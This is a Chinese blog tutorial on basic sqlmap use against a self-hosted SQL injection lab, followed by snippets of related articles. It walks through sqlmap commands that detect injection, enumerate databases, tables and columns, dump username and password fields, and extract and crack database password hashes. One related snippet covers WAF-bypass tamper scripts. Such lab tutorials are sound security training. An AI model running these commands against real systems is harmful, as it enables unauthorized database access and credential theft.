sqlmap的使用—初级

最新推荐文章于 2023-01-25 12:35:37 发布
最新推荐文章于 2023-01-25 12:35:37 发布
阅读量232 收藏
点赞数
分类专栏: 渗透测试 文章标签: 渗透测试 sqlmap 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40909772/article/details/118379666
版权
1.实验环境:自建sql注入靶场。
2.使用。
(1)判断是否存在注入点。
py2 sqlmap.py -u http://192.168.171.128:1235/Less-1/?id=1
(2)当注入点后面的参数大于等于两个时,需要加双引号。
py2 sqlmap.py -u "http://192.168.171.128:1235/Less-1/?id=1&uid=2"
(3)判断文本中的请求是否存在注入,从文件中加载HTTP请求,SQLMap可以从一个文本文件中获取HTTP请求,这样就可以不设置其他参数(如cookie、POST数据等),txt文件中的内容为Web数据包,如下所示:
文件名:1.txt

GET /Less-1/?id=1 HTTP/1.1
Host: 192.168.171.128:1235
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSIONID=733c3f6d-408f-40b0-9514-62afccee5b8f.LeeN9kulMUTmh-VZO5hZkKn8PLM; PHPSESSID=s11uo1s4ce83qeokoi79b2d8j5; security=impossible

判断是否存在注入的命令如下所示,运-r一般在存在cookie注入时使用。

py2 sqlmap.py -r 1.txt
(4)该命令是确定网站存在注入后,用于查询当前用户下的所有数据库,如下所示。如果当前用户有权限读取包含所有数据库列表信息的表,使用该命令就可以列出所有数据库。
py2 sqlmap.py -u http://192.168.171.128:1235/Less-1/?id=1 -dbs
(5)-dbs缩写成-D xxx,其意思是在xxx数据库中继续查询其他数据。
py2 sqlmap.py -u http://192.168.171.128:1235/Less-1/?id=1 -D xxx
(6)获取数据库中的表名:该命令的作用是查询完数据库后,查询指定数据库中所有的表名,如下所示。如果在该命令中不加入-D参数来指定某一个具体的数据库,那么SQLMap会列出数据库中所有库的表。
py2 sqlmap.py -u "http://192.168.171.128:1235/Less-1/?id=1" -D dvwa --tables
(7)获取表中的字段名:该命令的作用是查询完表名后,查询该表中所有的字段名,如下所示。
py2 sqlmap.py -u "http://192.168.171.128:1235/Less-1/?id=1" -D dvwa -T users --columns
(8)获取字段内容:该命令是查询完字段名之后,获取该字段中具体的数据信息,如下所示。
py2 sqlmap.py -u "http://192.168.171.128:1235/Less-1/?id=1" -D dvwa -T users -C user,password --dump
(9)获取数据库的所有用户:该命令的作用是列出数据库的所有用户,如下所示,在当前用户有权限读取包含所有用户的表的权限时,使用该命令就可以列出所有管理用户。
py2 sqlmap.py -u "http://192.168.171.128:1235/Less-1/?id=1" --users
(10)获取数据库用户的密码:该命令的作用是列出数据库用户的密码,如下所示。如果当前用户有读取包含用户密码的权限,Sqlmap会先列举出用户,然后列出Hash,并尝试破解。
py2 sqlmap.py -u "http://192.168.171.128:1235/Less-1/?id=1" --passwords
(11)获取当前网站数据库的名称:使用该命令可以列出当前网站使用的数据库,如下所示。
py2 sqlmap.py -u "http://192.168.171.128:1235/Less-1/?id=1" --current-db
(12)获取当前网站数据库的用户名称:使用该命令可以列出当前网站使用的数据库用户,如下所示。
py2 sqlmap.py -u "http://192.168.171.128:1235/Less-1/?id=1" --current-user
晶晶娃在战斗
关注
专栏目录
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 5万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
SQLMAP使用教程
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-26 1707
用法:python sqlmap.py [选项] 选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序版本信息并退出 -v VERBOSE 输出信息详细程度级别:0-6(默认为 1) 目标: 至少提供一个以下选项以指定目标 -d DIRECT 直接连接数据库 -u URL,.
sqlmap)【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型
05-26 1012
【sqllabs靶场】sqlmap
Web渗透-Sqlmap工具使用
最新发布
m0_62630794的博客
01-25 3890
SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB。以上的查询是指定带参数的url,同样我们也可以从文本文件中获取HTTP请求,这样就可以不设置其他参数。–tables是查询指定数据库里面的表。
sqlmap使用教程
hmysn的博客
07-27 1万+
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
sqlmap --tamper 绕过WAF脚本分类整理
热门推荐
whatday的专栏
01-29 5万+
支持的数据库 编号 脚本名称 作用 实现方式 all 1 apostrophemask.py 用utf8代替引号 ("1 AND '1'='1")  '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'  2 base64encode.py  用base64编码替换 ("1' A
SQLMap使用详解
未完成的歌~的博客
02-19 2万+
文章目录前言:一、SQLMap介绍1、Sqlmap简介:2、Sqlmap支持的注入方式:二、SQLMap安装三、SQLMap使用:1、判断是否存在注入:2、判断文本中的请求是否存在注入:3、查询当前用户下的所有数据库:4、获取数据库中的表名:5、获取表中的字段名:6、获取字段内容:7、获取数据库的所有用户:8、获取数据库用户的密码:9、获取当前网站数据库的名称:10、获取当前网站数据库的用户名称:四、SQLMap进阶:参数讲解1、-- level 5:探测等级2、-- is-dba:当前用户是否为管理权限3
SQLmap使用手册1
08-03
SQLmap是一个强大的工具,不仅适用于初级安全测试者,也满足专业渗透测试人员的需求。熟练掌握SQLmap使用,可以帮助你在保障网站安全方面发挥关键作用。请始终确保合法和道德地使用此类工具,避免非法入侵他人系统...
使用Sqlmap对dvwa进行sql注入测试(初级阶段)
fanxindong0620的博客
11-07 3406
0.测试准备 1)打开Kali虚拟机终端; 2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入的测试页面 1.获取DVWA的url和cookie 在输入框中输入1,显示有内容,此时利用此URL进行SQL注入。 输入document.cookie获取页面的cookie。去除remem_token字段的内容,用于下文的sql注入终...
Sqlmap使用教程
ygyydwx的博客
03-09 2143
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 教程说明 学习sqlmap前,建议了解SQL注入实现原理与基本的手工注入操作,更易于理解sqlmap使用。 我的另一个笔记整理:可能是网上最易懂的SQL手工注入教程【个人笔记精华整理】 针对sqlmap注入过waf,可以参考:sqlmap注入之t
sqlmap使用详解
ben_na_的博客
01-27 365
一、sqlmap基本使用 1、判断是否存在注入 (1) 当检测参数为一个的时候:python2 sqlmap.py -u http://localhost/sqli-master/Less-1/?id=1 (2)当参数大于等于两个时,需要加双引号:python2 sqlmap.py -u "http://localhost/sqli-master/Less-1/?id=1&uid=3" (3)当测试的位置是cookie或者post传值等位置时,需将获得流量包保存在txt文件中进行测试:python
sqlmap中常用的几个命令
liweibin812的博客
02-28 1476
1. -u:表示需要探测的目标站点url,例如: sqlmap.py -u http://127.0.0.1/sql1/Less-1/?id=1 注:如果url后参数个数大于等于2个,则需要加上双引号 sqlmap.py -u "http://127.0.0.1/sql1/Less-1/?id=1&username=zhangsan" 2. -r:表示判断一个文本中的请求...
sqli-labs靶场实现(三)【POST基于错误的注入(单引号、双引号)】(less-11~12、具体步骤+图文详解)
weixin_46709219的博客
12-15 831
一) 二) 三)
SQL - 单引号和双引号的区别
weixin_30719711的博客
08-01 2627
原文转载至:SQL中的单引号和双引号有区别吗? 在标准 SQL 中,字符串使用的是单引号。 如果字符串本身也包括单引号,则使用两个单引号(注意,不是双引号,字符串中的双引号不需要另外转义)。 但在其它的数据库中可能存在对 SQL 的扩展,比如在 MySQL 中允许使用单引号和双引号两种。 MySQL 参考手册: 字符串指用单引号'或双引号"引起来的字符序列。例如: 'a stri...
kali sqlmap笔记
qq_28719743的博客
09-14 4572
搭建sql注入平台 sql入门 判断是否存在注入 查询当前用户下的所有数据库 查询数据库中的表名 查询表中的字段名 查询字段内容 查询数据库中的所有用户 查询数据库用户密码 搭建sql注入平台 这里选择的是sqli-labs 在windows上搭建一下,具体过程就不多介绍了 搭建完毕 点击第一关 sql入门 判断是否存在注入 sql...
注意了,使用Sqlmap的你可能踩中了“蜜罐”
xj28555的博客
06-29 1395
Par0:楔子 你站在桥上看风景,看风景的人在楼上看你, 明月装饰了你的窗子,你装饰了别人的梦。 Par1:你要了解的事 渗透测试的同学应该都知道,在Linux下,sqlmap执行的语句大多是: Bash#sqlmap –u "http://sample.com/a=xxx&b=xxx" –data "postdata" or Bash#python sqlmap.py –u "http://sample.com/a=xxx&b=xxx" –cookie "..
Web安全攻防-----学习笔记(三)之SQLMap
舞指如歌~的博客
09-07 543
第3章 常用的渗透测试工具 3.1 SQLMap详解 SQLMap采用了五种独特的SQL注入技术: 基于布尔类型的盲注,可以根据返回页面 判断条件真假 的注入 基于时间的盲注,不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已执行(即页面返回时间是否增加)来判断 基于报错注入,页面会返回错误信息,或者把注入的语句的结果直接返回到页面中 联合查询注入,在可以使用...
sqlmap的安装与使用
ishopeqq的博客
10-10 1015
一,sqlmap是一个自动化的sql注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库有MySQL,Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2,SQLite, Firebird,Sybase和SAP MaxDB。 sqlmap支持五种不同的注入模式: 二,1,基于布尔的盲注,即可以根据返回页面判断条件真假的注入; 2,基于时间的盲注,即不能根据页面返回内容判断任何信息.
渗透测试学习笔记
山己见的博客
11-04 5387
本文只做学习用途,严禁利用本文提到的技术进行非法攻击,否则后果自负,本人不承担任何责任。 信息收集 收集域名信息 Whois查询 kali:whois baidu.com 爱站工具网:https://whois.aizhan.com 站长之家:http://whois.chinaz.com VirusTotal:https://www.virustotal.com 备案信息查询 ICP备案查询网:http://www.beianbeian.com 天眼查:http://www.tianyancha.
sqlmap详细使用指南
"这篇文档是关于sqlmap工具的详细使用指南,主要来自sqlmapproject/sqlmap项目。sqlmap是一款自动化的SQL注入工具,用于检测和利用SQL注入漏洞,以帮助安全研究人员或渗透测试者发现并接管数据库。" 在深入讨论...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

晶晶娃在战斗

你的鼓励将是我创作的最大动力!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值